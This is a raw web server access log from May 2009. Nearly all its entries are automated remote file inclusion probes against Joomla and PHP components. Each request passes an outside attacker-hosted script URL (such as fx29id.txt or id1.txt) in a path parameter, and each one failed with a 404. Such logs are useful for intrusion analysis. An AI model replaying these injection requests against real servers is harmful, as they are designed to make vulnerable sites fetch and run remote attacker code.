69.50.197.106 - - [29/May/2009:03:35:50 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:35:50 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:03:35:59 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.85.63.226 - - [29/May/2009:03:35:59 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.50.197.106 - - [29/May/2009:03:36:26 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:36:27 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:36:29 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:36:29 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:37:02 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:37:02 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:37:02 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:37:31 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:33 -0400] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:33 -0400] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:33 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:40 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:40 -0400] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:40 -0400] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:37:45 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:38:20 -0400] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:38:20 -0400] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [29/May/2009:03:38:22 -0400] "GET ////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:38:23 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.38.243.71 - - [29/May/2009:03:38:23 -0400] "GET /logs////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:38:31 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:03:38:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:03:39:07 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:39:10 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:39:17 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:39:17 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:39:17 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:39:29 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:39:36 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:39:45 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:39:46 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:39:50 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:03:40:36 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:03:40:36 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:03:40:36 -0400] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:40:46 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:40:46 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:40:47 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:41:10 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:41:10 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:41:10 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:14 -0400] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:14 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:14 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:16 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:16 -0400] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:41:17 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:41:26 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:41:38 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:41:38 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:41:38 -0400] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:41:39 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:42:08 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:42:08 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:42:08 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:03:42:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:03:42:10 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:03:42:11 -0400] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:42:13 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:42:13 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:42:13 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:03:42:41 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:42:50 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:42:52 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:43:25 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:27 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:27 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:27 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:03:43:29 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:43:35 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:03:43:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.208.111.178 - - [29/May/2009:03:43:39 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:43:39 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:43:39 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:43:53 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:56 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:56 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:43:56 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:44:04 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:44:30 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:03:44:32 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:44:37 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:44:37 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:44:41 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:45:06 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:45:06 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:45:06 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:45:19 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:45:19 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:45:19 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:45:21 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:03:45:53 -0400] "GET /logs/error_log.Q108103000//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:03:45:53 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.221.10.116 - - [29/May/2009:03:45:56 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:45:56 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:45:56 -0400] "GET /logs/access_log.Q109051600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:46:10 -0400] "GET /logs/access_log.Q109050300//components/com_sef/sef.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:03:46:25 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:03:46:28 -0400] "GET /logs/error_log.Q108103000//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:03:46:28 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:03:46:28 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
66.175.122.228 - - [29/May/2009:03:46:31 -0400] "GET /logs/access_log.Q109050700//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:03:48:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.17 - - [29/May/2009:03:48:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446D71A300AFDD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.237.146.58 - - [29/May/2009:03:49:05 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [29/May/2009:03:49:05 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [29/May/2009:03:49:06 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:03:49:09 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:49:18 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:49:18 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:49:18 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
